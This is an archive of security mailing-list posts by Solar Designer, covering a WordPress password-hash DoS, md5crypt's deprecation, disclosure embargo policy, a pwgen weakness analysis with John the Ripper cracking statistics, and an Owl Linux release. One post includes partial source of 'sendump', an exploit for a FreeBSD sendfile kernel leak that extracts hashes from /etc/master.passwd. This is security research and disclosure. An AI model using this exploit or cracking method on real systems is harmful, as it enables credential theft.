Re: WordPress 3.5.1, Denial of Service

2013-06-12 Thread Solar Designer
Hi guys,

I'll over-quote a little, then comment below:

On Tue, Jun 11, 2013 at 08:55:21PM +0200, Peter Bex wrote:
> On Fri, Jun 07, 2013 at 06:29:48PM +0200, Krzysztof Katowicz-Kowalewski wrote:
> > Version 3.5.1 (latest) of popular blogging engine WordPress suffers from 
> > remote denial of service vulnerability. The bug exists in encryption module 
> > (class-phpass.php). The exploitation of this vulnerability is possible only 
> > when at least one post is protected by a password.
[...]
> > More information (including proof of concept):
> > https://vndh.net/note:wordpress-351-denial-service
[...]
> This phpass.php isn't hand-rolled like you stated in your blog post; it's
> a copy of a public domain crypt()-workalike: http://www.openwall.com/phpass/
> There are several other systems which implement their password hashing
> using this library.
> 
> Having said that, being able to control the setting looks like a mistake on
> the part of Wordpress, so I'm not sure the bug is in phpass, strictly
> speaking.  However, have you considered contacting upstream
> (Solar Designer/OpenWall) about this?

Web apps (like WordPress) were indeed not supposed to expose the ability
for untrusted users to specify arbitrary "setting" strings (which
include the configurable cost).  I am unfamiliar with WordPress, so I
don't know why they do it here - is this instance of their use of phpass
perhaps meant to achieve similar goals that tripcodes do?  If so, yes,
they should be sanitizing the cost setting (perhaps with a site admin
configurable upper bound).  However, for password hashes coming from
WordPress user/password database (primary intended use of phpass), this
should not be necessary.  (Indeed, a similar DoS attack could be
performed by someone having gained write access to the database, but
that would likely be the least of a site admin's worries.)

The problem of DoS attacks via attacker-chosen cost settings with
tunable password hashing schemes like this is actually a general one
(and it's even more of a problem when the memory cost is also tunable).
An example is the Apache web server, where local DoS is possible via
malicious bcrypt or (more recently) also SHA-crypt hashes in .htpasswd
files.  (And to a lesser extent also via extended DES-based hashes,
which are supported on *BSDs and more.)  Although the DoS is local, it
affects other users of the Apache instance (not just the attacking local
user) and potentially of the entire system.  Arguably, the fact that
Apache is in general very susceptible to various DoS attacks qualifies
as an excuse (there's no expectation of any DoS resistance with Apache,
is there?) ;-)  (e.g., wouldn't having it read a "huge" sparse file
result in similar behavior?)

Arguably, library code should reject the most insane parameter values.
For example, musl libc - http://www.musl-libc.org - version 0.9.10
rejects bcrypt's log2(cost) > 19 and limits SHA-crypt's rounds count
to < 10M for this reason (original SHA-crypt limits to < 1 billion).
However, on one hand this is insufficient (if an application exposes the
setting as untrusted input, it should have its own sanitization and/or
other safety measures anyway) and on the other hand the arbitrary limits
may be problematic in some obscure cases (e.g., when reusing the same
underlying password hashing scheme as a KDF for encrypting a rarely-used
piece of data locally).  So it's more of a partial workaround for the
present state of things e.g. with Apache, than it is a real solution.

Maybe future password hashing APIs should include a function to sanitize
a provided setting string given certain high-level limits (not abstract
log2(cost) numbers, but e.g. microseconds and kilobytes - even though
the function may have to use estimates of the expected actual usage).
Applications would then be advised to use this function if and where
appropriate.  Alternatively, maybe the password hashing function itself
should accept these upper limits as optional inputs (and refuse to work,
in some fail-close manner, if the limits would likely be exceeded).

Except for the specific upper limits imposed by musl, which were chosen
last year, none of the above is new - it's just that we all have been
sitting on this general issue for many years.  It's about 20 years since
extended DES-based hashes with variable iteration counts were introduced
in BSD/OS in early 1990s and reimplemented in FreeSec in 1993, and
Apache's .htpasswd (predecessor) is maybe only slightly younger.

Nice find regarding the specific WordPress issue, though!  And a nice
reminder, too.

Alexander


Re: CVE-2012-3287: md5crypt is no longer considered safe

2012-06-12 Thread Solar Designer
On Fri, Jun 08, 2012 at 12:04:49AM +, p...@freebsd.org wrote:
> The LinkedIn password incompetence has resulted in a number of "just use 
> md5crypt and you'll be fine" pieces of advice on the net.
> 
> Since I no longer consider this to be the case, I have issued an official 
> statement, as the author of md5crypt, to the opposite effect:
> 
> http://phk.freebsd.dk/sagas/md5crypt_eol.html
> 
> Please find something better now.

Thank you for posting this - it was interesting to learn of your opinion
on the matter after all those years!  Ditto re: "The history of md5crypt":

http://phk.freebsd.dk/sagas/md5crypt.html

Now, since some people are in fact still using md5crypt, they'll think
of what to move to.  You almost recommend them to roll their own - a
recommendation I disagree with (as we've already discussed off-list).

The main options are bcrypt and SHA-crypt.  Many would recommend scrypt
instead - for good reasons - but there's no crypt(3) interface for it
yet, also for good reasons, e.g.:
http://www.openwall.com/lists/crypt-dev/2011/05/12/4

Personally, I think that bcrypt and SHA-crypt are quite close to
becoming obsolete in favor of something new, yet right now I would still
recommend moving to bcrypt as the most suitable pre-existing password
hashing method.  So if you're to move to something "temporary" at all,
better move to a password hashing method already in use - and for now
this should be bcrypt - than roll your own.  (My opinion only, indeed.
Someone else may disagree.)

What's wrong with bcrypt, though?  Mainly two things, I think:

1. Not enough natural parallelism in one instance (so that it could be
made use of by an authentication server and not only by an attacker,
who always has plenty of parallelism due to having lots of candidate
passwords to try).  I started complaining about this around 1998, but
this problem was not pressing enough to introduce yet another password
hashing method so far.  The speedup from extra parallelism available to
attacker only is up to a factor of 2 on typical CPUs so far (due to
instruction level parallelism only, but not SIMD).  However, I expect
this to change with AVX2 VSIB addressing (gather) next year, which
appears to allow for parallel computation of 8 bcrypt hashes in 256-bit
vectors - by attacker only.  There may be fewer vector units than ALUs,
though, so the speedup over what the attacker currently has (already up
to 2x faster than defender) will likely be significantly less than 8x.

2. The memory requirement of 4 KB is not configurable and is rather
low - barely enough to defeat GPUs so far, but this may change, and
there may be other hardware-based attacks.  So far, experimental John
the Ripper patches by Sayantan Datta achieve CPU-like performance at
bcrypt on AMD Radeon HD 7970 (we have to either use the slow global
memory or explicitly heavily under-utilize the GPU's computing resources
so that the smaller number of concurrent bcrypt computations fits in
local memory), but there's room for improvement:
http://www.openwall.com/lists/john-dev/2012/06/06/1
(The c/s rates are for $2a$05, used as baseline for historical reasons;
for comparison, AMD FX-8120 CPU provides approx. 5400 c/s at that setting,
which is slightly faster than the GPU so far.)  I expect that
significant speedup over CPU may be demonstrated soon (just not as
significant as it is for MD5, etc.)  Here are some very rough estimates
for the potential speedup:
http://www.openwall.com/lists/john-dev/2012/05/14/1

What's wrong with SHA-crypt?  It's similar, but worse:

1. Not enough natural parallelism in one instance.  Well, at least it
uses 64-bit integers (the flavor based on SHA-512), whereas bcrypt is
32-bit only, but on the other hand in addition to extra instruction
level parallelism while cracking we can also use SIMD (on current CPUs
already, even though this is not implemented yet).

2. Almost no memory requirements.  The register pressure is a bit high
for GPUs, but not to the point where GPUs would not provide an advantage.

So far, SHA-crypt at its default rounds=5000 is crackable on a GPU at
more than 10x the speed of bcrypt at comparable settings ($2a$08, which
is default on some systems), due to John the Ripper patch by Claudio Andre:
http://www.openwall.com/presentations/PHDays2012-Password-Security/mgp00037.html

Thus, out of these two bcrypt wins, and the rest are either worse or not
yet ready for end-user consumption (sysadmin, web app author, etc.)


(OK, I already plugged some links to openwall.com pages above, but this
is getting too much, hence the tags.)

I made a talk on this topic at PHDays last week.  Here are the slides:

http://www.openwall.com/presentations/PHDays2012-Password-Security/

I give some historical background on password security with focus on
password hashing (1960s to 2012), and then in the last 9 slides I share
some thoughts on the future:

Desirable properties of a future KDF
KDFs unfriendly to hardware we do not have
CPU + RA

Re: CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)

2012-03-27 Thread Solar Designer
Hi,

As stated in the timeline below (thanks!), this issue was handled in
part using the Openwall-hosted distros list (which currently notifies
many Linux distro vendors, FreeBSD, and NetBSD/pkgsrc with PGP
re-encryption to individual recipients):

http://oss-security.openwall.org/wiki/mailing-lists/distros

The primary reason why I feel I have to post this follow-up message is
that the long embargo period here was a major violation of the list's
policy.  It is the second major violation so far; the first one was for
HashDoS, and it was similarly discussed on oss-security after the fact:

http://www.openwall.com/lists/oss-security/2011/12/29/4
http://www.openwall.com/lists/oss-security/2011/12/29/7

It's cases like this that may eventually make us reconsider and stop
hosting the non-public lists.  (Some propose automatic publishing of
messages after N days as an alternative.)  Luckily, so far violations
like this have been relatively rare, and one of the reasons why I feel
every one of them needs attention is to keep it so.

I've included more detail below:

On Sat, Mar 24, 2012 at 09:40:42AM -0700, VSR Advisories wrote:
> 2012-01-09OpenOffice, LibreOffice, AbiWord, KOffice, and libraptor
>   maintainers were provided a draft advisory and test sample.
>   The OpenWall "distros" mailing list was also notified.
>   Apache OpenOffice Security team acknowledged notification.
>   libraptor developer confirmed flaw.
> 
> 2012-01-10CVE-2012-0037 assigned by Apache.
> 
> 2012-02-02Notified OpenWall "distros" mailing list again, due to previous
>   technical problems.

IIRC, the "technical problems" being referred to here were an attachment
not being re-encrypted to list members, so they only had partial info
until this point - essentially just the fact that there's a
vulnerability in those products, but with no detail; given the extra
embargo time (not needed by distro vendors) this may actually be good.
The list setup is a bit picky about what encrypted message formats it
supports (besides plaintext, they may be PGP/MIME or PGP inline, but
they can't have individual pre-encrypted attachments - this has since
been clarified on the wiki).

> 2012-02-04libraptor developer provided patches to all notified parties.
> 
> 2012-02-22Extensive arguing between vendors about embargo/release date.
> 
> 2012-03-06More arguing about release date.
> 
> 2012-03-14Agreed upon release date established.
> 
> 2012-03-22Security updates and vendor advisories released.
> 
> 2012-03-24VSR advisory released.

At the time of the initial notification in January, the distros list
policy was to allow a maximum embargo period of 14 days (and this was
stated on the wiki page with the list posting address).  At the time of
the second notification in February, the policy was stated as:

"Please note that the maximum acceptable embargo period for issues
disclosed to these lists is 14 to 19 days, with embargoes longer than 14
days (up to 19) allowed in case the issue is reported on a Thursday or a
Friday and the proposed coordinated disclosure date is thus adjusted to
fall on a Monday or a Tuesday.  Please do not ask for a longer embargo.
In fact, embargo periods shorter than 7 days are preferable."

When it became apparent that this was to be violated since one or two of
the affected upstreams wanted much more time, the reporter (Timothy D.
Morgan of VSR Security) explained that at the time of his initial
notification he had thought that 14 days would in fact be enough.  While
this sounds like a rather fundamental problem with a maximum embargo
time policy (it is always possible that something new is discovered
during discussion, which may invalidate the initial time estimate of the
reporter), I've just added the following verbiage to hopefully reduce
the number of such occurrences going forward:

"If you have not yet notified upstream projects/developers of the
affected software, other affected distro vendors, and/or affected Open
Source projects, you may want to do so before notifying one of these
mailing lists in order to ensure that these other parties are OK with
the maximum embargo period that would apply (and if not, then you may
have to delay your notification to the mailing list), unless you're
confident you'd choose to ignore their preference anyway and disclose
the issue publicly soon as per the policy stated here."

Of course, I fully expect this attempt to sometimes fail, but maybe -
just maybe - it will help in some cases.  There's no perfect solution
here (although some would reasonably argue that simply not doing any
pre-disclosure coordination is perfect - in a way it is).

The time required by the free office product vendors to issue a security
fix here reminded me of web browsers in 1990s.  Several web browser
vendors have since learned to issue security fixes much quicker, but
apparently office vendors still lack processes to do so

Re: pwgen: non-uniform distribution of passwords

2012-01-23 Thread Solar Designer
On Thu, Jan 19, 2012 at 11:34:12PM +0400, Solar Designer wrote:
> $ ./pwgen -1cn 8 10 | dd obs=10M > 1g
...
> $ time ~/john/john-1.7.9-jumbo-5/run/unique -v -mem=25 1gu < 1g
> Total lines read 10 Unique lines written 697066573

Here's some further analysis of the 1 billion sample used as a training
set along with a separate 1 million sample used as a test set:

Applying the 697 million unique passwords (from the 1 billion sample
above) as a wordlist (6 GB file size) to crack another 1 million of
pwgen'ed passwords cracks 418168 of them (41.8%).  For a uniform
distribution (which is not the case), this would correspond to total
keyspace size of about 1.67 billion passwords (between 30 and 31 bits).

Focusing on more frequent pwgen'ed passwords only:

The most common passwords in my 1 billion sample happen to be, prefixed
by number of occurrences:

127 Ooquoo0e
125 ooghai0E
123 eiThie7e
123 aiShie8o
122 eiQuei9u
122 Aighah4u
121 eichae1I
121 Oophai4o
121 Oochoh5u
121 Iephee6e

the next one is seen 120 times.  Overall, there are 3452 unique
passwords with 100 occurrences or more (in 1 billion generated).

Taking these 3452 as a wordlist cracks 284 passwords in the separate
1 million sample.  This is 0.0284%.  However, 3452 is only %0.0002 of
the 1.67 billion estimate for the keyspace size that we arrived at
above.  Hence, the distribution is non-uniform, and our speedup from
exploiting this property is at least 137x on this test.  (284 / 2 is
obviously 142, but I used more precise numbers here.)

Checking this another way, the keyspace size estimate assuming uniform
distribution would be only 12 million based on the test above - a lot
lower than the previous estimate.  This similarly confirms that the
distribution is non-uniform.

Top 1 million unique passwords from my 1 billion training set cracks
37149 in the test set (3.7%).  The corresponding uniform keyspace size
estimate is 27 million.

Top 10 million unique passwords cracks 145179 (14.5%).  The keyspace
size estimate is 69 million.

Top 100 million unique passwords cracks 262693 (26.3%).  The keyspace
size estimate is 381 million.

Finally, only 115339574 unique passwords are seen in the 1 billion
sample more than once.  (This is less than 1000-697 = 303 million
because many passwords are seen more than 2 times each.)  Using them as
a wordlist cracks 276382 (27.6%).  The keyspace size estimate is 417
million.

Chances are that I won't spend further time on this, although a possible
project would be to create a program that would output all or top N of
pwgen'ed passwords using exact probabilities (based on analysis of
pwgen's source code or/and behavior of pwgen with non-random inputs
rather than based on normal pwgen invocations like I did so far, which
only provides estimates).  This would result in more efficient attacks
(more passwords in the test set cracked per candidate passwords tested).

Alexander


Re: pwgen: non-uniform distribution of passwords

2012-01-20 Thread Solar Designer
On Thu, Jan 19, 2012 at 09:21:17AM +0100, valentino.angele...@enel.com wrote:
> may ask you what software (and how it works brute force ecc) you used?

John the Ripper, indeed - generating a custom .chr file (which is based
on trigraph frequencies) from a sample of 1 million of pwgen'ed
passwords and then using this file to crack another (non-overlapping)
sample of pwgen'ed passwords.  My initial notification to oss-security
and Bugtraq included these links, which describe this in more detail:

http://www.openwall.com/lists/john-users/2010/11/17/7
http://www.openwall.com/lists/john-users/2010/11/22/5
http://www.openwall.com/lists/john-users/2010/11/28/1
http://www.openwall.com/lists/john-users/2010/12/06/1

However, as I wrote in a followup posting to oss-security 2 days ago:

"I might update/revise my analysis on this issue in a few days.

Specifically, I now suspect that a (large) part of the apparent
non-uniformity of the distribution was in fact an artifact of my
analysis approach.  I only analyzed sets of 1 million of pwgen'ed
passwords, so I could not directly check the distribution of full
passwords (1 million is too little, even compared to the small keyspace
of these passwords), whereas JtR only uses trigraph frequencies.

I am now generating 1 billion of pwgen'ed passwords, which should take a
couple of days to complete. [...]"

http://www.openwall.com/lists/oss-security/2012/01/17/14

This has in fact completed by now:

$ ./pwgen -1cn 8 10 | dd obs=10M > 1g
17578125+0 records in
858+1 records out
90 bytes (9.0 GB) copied, 147496 seconds, 61.0 kB/s

And I analyzed this larger sample briefly:

$ time ~/john/john-1.7.9-jumbo-5/run/unique -v -mem=25 1gu < 1g
Total lines read 10 Unique lines written 697066573

real144m40.619s
user142m8.727s
sys 0m39.645s

So that's 697 million unique passwords in 1 billion, which for a uniform
distribution would correspond to a total keyspace size of 1.3 billion:

$ ./solve 697066573 10
1296935185

I've attached the solve.c program to this message.  [ BTW, I verified
that there's no fatal precision loss in its expected_different()
function (despite of the risky expression) for the value ranges on which
it is called here.  I did so by also computing the expected different
value with a different (much slower) algorithm - just not as part of
equation solving (which would be slower yet). ]

However, let's see what numbers we get for smaller samples (actually,
subsets of the 1 billion sample above, but that's OK in this case):

Total lines read 1 Unique lines written 89163247
Total lines read 1000 Unique lines written 9811335
Total lines read 100 Unique lines written 997978

$ ./solve 89163247 1
427419891
$ ./solve 9811335 1000
261676022
$ ./solve 997978 100
246946702

As we can see, the guess for the total keyspace size keeps increasing as
we increase the sample size.  That's under assumption that we have a
uniform distribution.  Hence, our distribution is non-uniform.

That said, the keyspace may in fact be smaller than I had expected,
although I haven't hit it with my 1 billion sample yet.  So we have a
mix of two problems here: likely small keyspace and non-uniform
distribution.

My John the Ripper pwgen.chr attack was probably testing a lot of
passwords that are actually impossible, so a much faster attack (even
more specifically focused on pwgen'ed passwords) should be possible.

I think I underestimated just how much smaller pwgen's pronounceable
passwords keyspace is compared to the full {62 different, length 8}
keyspace, although we still do not have the exact number.

I continue to think that the primary problem in terms of pwgen use is
that these passwords look much stronger than they actually are.  For
example:

$ pwgen
athu9Bee Vae0jexa rae2Oa1c Aim8Ku3c No5aep0F OhY5quee ieVae2ti wah1aiM2
oaNg1oth baePule5 sod8oH6i ohfoh5Du Pai9Uch7 AeG3bies Maev6tae iKievae9
zo9eiSai Xito9aid iGh3ay8s owib0Ub8 Yahm0oaC Wu3VaiK7 IeK3sah2 xai7Eico
...

Looking at these, how many people would realize that the keyspace for
them may be thousands of times smaller than the full {62 different,
length 8} keyspace and that the distribution may be non-uniform?

Based on the 1 billion sample, the keyspace is 168,350 times smaller,
although this estimate has the non-uniformity "factored in" (a larger
sample would show a somewhat larger keyspace estimate).

A partial fix may be for pwgen to print a warning each time it is used
in this mode and with output to a tty (it already behaves differently
based on whether its output is a tty or not, so that won't be a new
drawback).  Also, the default mode may be changed to the "secure" one,
with the weak alternative available via a non-default option.


Or indeed people can just use pwqgen instead:

http://www.openwall.com/passwdqc/

$ for n in {1..10}; do pwqgen; done
Warm5Claw4Blame
hungry5tomato3Yeah
Midst_Vowel9Spate
Ohio7steak$Mild
Taxi&desert+gorge
fond-Pint=easy
mo

Re: pwgen: non-uniform distribution of passwords

2012-01-18 Thread Solar Designer
On Tue, Jan 17, 2012 at 02:01:38PM +0400, Solar Designer wrote:
> Time running (D:HH:MM) - Keyspace searched - Passwords cracked
> 0:00:02 - 0.0008% - 6.0%
> 0:01:00 - 0.025% - 19.5%
> 0:20:28 - 0.5% - 39.1%
> 1:16:24 - 1.0% - 47.1%
> 3:00:48 - 1.8% - 55.2%
> 3:21:44 - 2.3% - 59.4%
> 5:05:17 - 3.1% - 64.2%
...
> I did some testing of pwgen-2.06's "pronounceable" passwords, and I
> think they might be weaker than you had expected (depends on what you
> had expected, which I obviously don't know).

It was just pointed out to me off-list that the man page for pwgen
specifically mentions that this kind of passwords "should not be used in
places where the password could be attacked via an off-line brute-force
attack."  I had missed that detail or at least I did not recall it.

This kind of documentation certainly mitigates the problem to some extent.

Yet I think this gives users the perception that only the keyspace is
smaller, not that the generated passwords are distributed non-uniformly.
In fact, most users would not even think of the latter risk.

The passwords look much stronger than they actually are, and I think
this is a problem.  They look like almost random sequences of 8
characters, whereas the level of security for 6% to 20% of them is
similar to that of dictionary words with minor mangling.

Sure, there's a trade-off, but non-uniform distribution didn't have to
be part of it.  That's an implementation shortcoming.

> Specifically, not only the keyspace is significantly smaller than that
> for "secure" passwords (which I'm sure you were aware of), but also the
> distribution is highly non-uniform.  My guess is that this results from
> different phonemes containing the same characters.  So certain
> substrings can be produced in more than one way, and then some
> characters turn out to be more probable than some others (especially as
> it relates to their conditional probabilities given certain preceding
> characters).

Alexander


pwgen: non-uniform distribution of passwords

2012-01-17 Thread Solar Designer
Hi,

I never heard back from Ted on the below.  I am not complaining -
I understand that Ted is super busy with great stuff like ext4 - yet I
think it's time to bring this to oss-security (for distros) and to
Bugtraq (for end-users).  (Not really "to make this public" since the
issue was already discussed in public on john-users.)

Some highlights (excerpts from the longer message below):

"Time running (D:HH:MM) - Keyspace searched - Passwords cracked
0:00:02 - 0.0008% - 6.0%
0:01:00 - 0.025% - 19.5%
0:20:28 - 0.5% - 39.1%
1:16:24 - 1.0% - 47.1%
3:00:48 - 1.8% - 55.2%
3:21:44 - 2.3% - 59.4%
5:05:17 - 3.1% - 64.2%

6% of pwgen'ed passwords get cracked in 2 minutes.  This is with NTLM
hashes, which are obviously very fast.  For the MD5-based crypt(3),
NTLM's 2 minutes would translate to 2 days, and this would apply
per-salt, yet having 6% of passwords crackable in 2 days on a single CPU
core is probably unacceptable.

What might be worse is that 0.5% of passwords get cracked in 1 second
(NTLM).  This is approx. 20 minutes for MD5-based crypt(3) hashes, also
on one CPU core.  0.5% is small, but not negligible."

Additional notes for Bugtraq:

Now is a good time because a related issue was just brought up:

"gpw password generator giving short password at low rate"
http://www.openwall.com/lists/oss-security/2012/01/17/2

Oh, and while I am at it: beware of JavaScript password generators -
these are almost universally broken by design.

Not very closely related, but DragonFly BSD's password hashing is
ridiculous (non-portable and weaker than FreeBSD's).  I am gradually
bringing more attention to the problem in an attempt to get it
corrected (this posting is one such step):

http://www.openwall.com/lists/oss-security/2012/01/16/2

Alexander

- Forwarded message from Solar Designer  -----

Date: Tue, 25 Jan 2011 17:51:43 +0300
From: Solar Designer 
To: Theodore Ts'o 
Subject: pwgen: non-uniform distribution of passwords

Hi Ted,

I did some testing of pwgen-2.06's "pronounceable" passwords, and I
think they might be weaker than you had expected (depends on what you
had expected, which I obviously don't know).

Specifically, not only the keyspace is significantly smaller than that
for "secure" passwords (which I'm sure you were aware of), but also the
distribution is highly non-uniform.  My guess is that this results from
different phonemes containing the same characters.  So certain
substrings can be produced in more than one way, and then some
characters turn out to be more probable than some others (especially as
it relates to their conditional probabilities given certain preceding
characters).

By generating a custom .chr file for John the Ripper based on a lot of
pwgen'ed passwords, I am able to crack further pwgen'ed passwords a lot
faster - possibly faster than you would have expected.  This is without
any custom programming yet, which could provide a further speedup (by
fully avoiding candidate passwords that couldn't possibly be generated).

Time running (D:HH:MM) - Keyspace searched - Passwords cracked
0:00:02 - 0.0008% - 6.0%
0:01:00 - 0.025% - 19.5%
0:20:28 - 0.5% - 39.1%
1:16:24 - 1.0% - 47.1%
3:00:48 - 1.8% - 55.2%
3:21:44 - 2.3% - 59.4%
5:05:17 - 3.1% - 64.2%

That is, 6% of pwgen'ed passwords get cracked in 2 minutes.  This is
with NTLM hashes, which are obviously very fast.  For the MD5-based
crypt(3), NTLM's 2 minutes would translate to 2 days, and this would
apply per-salt, yet having 6% of passwords crackable in 2 days on a
single CPU core is probably unacceptable - or at least not what users of
pwgen would reasonably expect (I think), unless they're explicitly told
about this.  On a quad-core, this is 6% in half a day.

What might be worse, but is not seen in the table above, is that 0.5%
of passwords get cracked in 1 second (NTLM).  This is approx. 20 minutes
for MD5-based crypt(3) hashes, also on one CPU core.  0.5% is small, but
not negligible.

The "keyspace searched" column above shows percentage of the full
{62 different, length 8} keyspace.  I'd also include percentages of the
smaller keyspace that corresponds to the pronounceable passwords only,
but its size is non-trivial to calculate, so I did not bother...

Additionally, there are over 2 thousand duplicates in just 1 million of
generated passwords.  Sounds like too many dupes.  Not what a user would
expect, I think.

More info on the attack:

http://www.openwall.com/lists/john-users/2010/11/17/7
http://www.openwall.com/lists/john-users/2010/11/22/5
http://www.openwall.com/lists/john-users/2010/11/28/1
http://www.openwall.com/lists/john-users/2010/12/06/1

The "secure" ("-s") passwords appear to be safe from this:

http://www.openwall.com/lists/john-users/2010/12/07/3

A reimplementation of pwgen in JavaScript shows even worse behavior:

http://www.openwall.com/lists/j

6-year FreeBSD-SA-05:02.sendfile exploit

2011-04-01 Thread Solar Designer
Hi,

This is almost 0-day.  In a sense.

I wrote this for a pentesting company.  I found it ethically OK to do
since the FreeBSD advisory was already out for a couple of weeks.
It turns out I was not alone to write an exploit for this bug, and to
publish the exploit this year.

Timeline:

2005/04/04 - FreeBSD-SA-05:02.sendfile published:
http://security.freebsd.org/advisories/FreeBSD-SA-05:02.sendfile.asc

2005/04/16 - reliable FreeBSD 4.x local exploit written ...

2005/04/21 - ... and updated to work on 5.x as well (up to 5.3)

2011/02/05 - Kingcope publishes "FreeBSD <= 5.4-RELEASE ftpd (Version
6.00LS) sendfile kernel mem-leak Exploit":
http://seclists.org/fulldisclosure/2011/Feb/83
(By the way, the "<=" is wrong.)

2011/04/01 - Hey, that's today.


Openwall is participating in Google Summer of Code 2011.  Applications
from students and mentors are currently accepted.  And this is no joke.
Besides Owl and JtR tasks (for which we're already seeing a competition
among students), we have a number of reasonably crazy ideas that a
student could work on.  Please take a look.  Although our "capacity" for
GSoC 2011 is quite limited, some of these may be worked on outside of
GSoC as well.

http://www.google-melange.com/gsoc/org/google/gsoc2011/openwall
http://openwall.info/wiki/ideas


--- sendump.c ---
/*
 * sendump - FreeBSD-SA-05:02.sendfile exploit - 2005/04/16.
 * Updated for FreeBSD 5.x, added alternate hash types, added optional
 * relaxed pattern matching - 2005/04/21.
 *
 * This program is meant to be used in controlled environments only.
 * If found in the wild, please return to ... wait, this is public now,
 * and this program is hereby placed in the public domain.  Feel free to
 * reuse parts of the source code, etc.
 *
 * Password hashes will be dumped to stdout as they're being obtained.
 * There may be duplicates.
 *
 * Debugging may be enabled with one to three "-d" flags.  Debugging
 * information will be dumped to stderr and, for levels 2 and 3, to
 * the "dump" file.
 *
 * Relaxed pattern matching may be enabled with "-r".  This increases
 * the likelihood of printing garbage while also making it more likely
 * to actually catch the hashes.
 *
 * There's some risk of this program crashing the (vulnerable) system,
 * although this is not intentional.  Normally, the program just prints
 * password hashes from /etc/master.passwd in a format directly usable
 * with John the Ripper.
 *
 * Compile/link with "gcc -Wall -O2 -fomit-frame-pointer -s -lutil".
 *
 * Run this on a filesystem with soft-updates for best results.
 */
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* for forkpty(); will also need to link against -lutil */
#include 
#include 
#include 

#define Ki  1024
#define Mi  (1024 * Ki)

#define DUMP_NAME   "dump"

#define DUMMY_NAME  "dummy"
#define DUMMY_SIZE  (128 * Mi)
#define SOCKET_BUF  (196 * Ki)

#define DUMMY_RAND_BITS 4
#define DUMMY_RAND_MASK ((1 << DUMMY_RAND_BITS) - 1)

#define MAX_LOGIN   16
#define MAX_GECOS   128
#define MAX_HOME128
#define MAX_SHELL   128

static char itoa64[64] =
"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

static int debug = 0, relaxed = 0;
static char buf[SOCKET_BUF];

static void pexit(char *what)
{
perror(what);
exit(1);
}

static void write_loop(int fd, char *buf, int count)
{
int offset, block;

offset = 0;
while (count > 0) {
block = write(fd, &buf[offset], count);
if (block < 0) pexit("write");
if (!block) {
fprintf(stderr, "write: Returned 0\n");
exit(1);
}

offset += block;
count -= block;
}
}

static void dump(char *buf, int count)
{
static int fd = -1;

if (fd < 0) {
fd = creat(DUMP_NAME, S_IRUSR | S_IWUSR);
if (fd < 0) pexit("creat");
}
write_loop(fd, buf, count);
}

static int nonzero(char *buf, int count)
{
char *p, *end;

p = buf;
end = buf + count;
while (p < end)
if (*p++) return 1;

return 0;
}

static int search(char *buf, int count)
{
static char prevuser[MAX_LOGIN + 1], prevpass[61];
char *p, *q, *end;
int n;
char *user, *pass, *gecos, *home, *shell;
struct passwd *pw;
int found = 0;

p = buf;
end = buf + count;
while (p < end && (p = memchr(p, '/', end - p))) {
q = p++;
if (q < buf + (1+1+1+13+2+0+1+1+1)) continue;
shell = q;
n = 0;
while (q < end && *q++ > ' ') n++;
if (n < 2 || n > MAX_SHELL) continue;
if (q >= end || *q != '\0') continue;
 

Openwall GNU/*/Linux 3.0 is out, marks 10 years of the project

2010-12-16 Thread Solar Designer
Hi,

I am pleased to announce that we have made a new major release of
Openwall GNU/*/Linux, version 3.0.  ISO images of the CDs for i686
and x86-64 are available for download via direct links from:

http://www.openwall.com/Owl/

The ISOs include a live system, installable packages, the installer
program, as well as full source code and the build environment.
The download size is under 450 MB (for one CPU architecture).

Additional components, such as OpenVZ container templates, are available
from the appropriate directories on the mirrors:

http://www.openwall.com/Owl/DOWNLOAD.shtml

Openwall GNU/*/Linux (or Owl for short) is a small security-enhanced
Linux distribution for servers, appliances, and virtual appliances.
Owl live CDs with remote SSH access are also good for recovering or
installing systems (whether with Owl or not).  Another secondary use is
for operating systems and/or computer security courses, which benefit
from the simple structure of Owl and from our inclusion of the complete
build environment.

This release marks roughly 10 years of our project - development started
in mid-2000, and Owl 0.1-prerelease was made public in 2001.  Curiously,
most other "secure" Linux distros that appeared at about the same time
are no longer around.  (EnGarde Secure Linux appears to be the only
exception, but it is completely different both in approach to security
and in functionality.)

With the 3.0 release, the Owl 2.0-stable branch is formally discontinued.
We intend to proceed with further development under Owl-current and to
maintain the newly-created Owl 3.0-stable branch until the next release,
as usual.  (Owl 3.0-stable will be made available as soon as it starts
to differ from the 3.0 release.)

Here's how upgrades from Owl 2.0-release, 2.0-stable, or from pre-3.0
Owl-current to Owl 3.0 may be performed:

http://openwall.info/wiki/Owl/upgrade

(To upgrade from an even older version of Owl, you need to upgrade to
Owl 2.0-release in the same fashion first.)

Many of the enhancements since Owl 2.0 are documented in the change log:

http://www.openwall.com/Owl/CHANGES-3.0.shtml

They include:

- x86-64 support;
- move to RHEL 5.5-like Linux 2.6 kernels (with additional changes);
- kernel in an RPM package designed to allow for easy non-RPM'ed
kernel builds as well (optional);
- integrated OpenVZ container-based virtualization support (optional);
- "make iso" and "make vztemplate" targets in the build environment
(to easily generate new Owl CD images and OpenVZ container templates);
- ext4 filesystem support (in fact, Owl 3.0's installer offers ext4 by
default, with ext3 and ext2 still available as options);
- xz compression support (LZMA, LZMA2) throughout the system (not only
xz* commands, but also support in tar, rpm, less, color ls output);
- a few new packages (smartmontools, mdadm, cdrkit, pciutils, dmidecode,
vzctl, vzquota, xz);
- lots of package updates;
- improved hardware compatibility and more intuitive installation process;
- credentials logging in syslogd (the sender's UID and PID are logged
unless the sender is root);
- key blacklisting support in OpenSSH;
- and many other enhancements and corrections.

A curious detail is that there are no SUID programs in a default install
of Owl 3.0.  Instead, there are some SGIDs, where their group level
access, if compromised via a vulnerability, can't be expanded into
root access without finding and exploiting another vulnerability in
another part of the system - e.g., a vulnerability in crontab(1) or
at(1) can't result in a root compromise without a vulnerability in
crond(8) or in a critical system component relied upon by crond(8).

Feedback is welcome via the owl-users mailing list.  Specifically, you
may use this opportunity to vote for changes to make and features to
implement during post-3.0 development leading up to the next release.

Enjoy!

Alexander

P.S. John the Ripper achieves over 50M c/s at cracking DES-based
crypt(3) on a quad-X7550 machine (32 cores, 64 logical CPUs), with one
of the OpenMP patches:

http://openwall.info/wiki/john/benchmarks
http://openwall.info/wiki/john/patches

It also achieves over 20M c/s on a more humble dual-X5460 machine
(8 cores, 8 logical CPUs), cracking 400k passwords from Gawker:

http://www.duosecurity.com/blog/entry/brief_analysis_of_the_gawker_password_dump
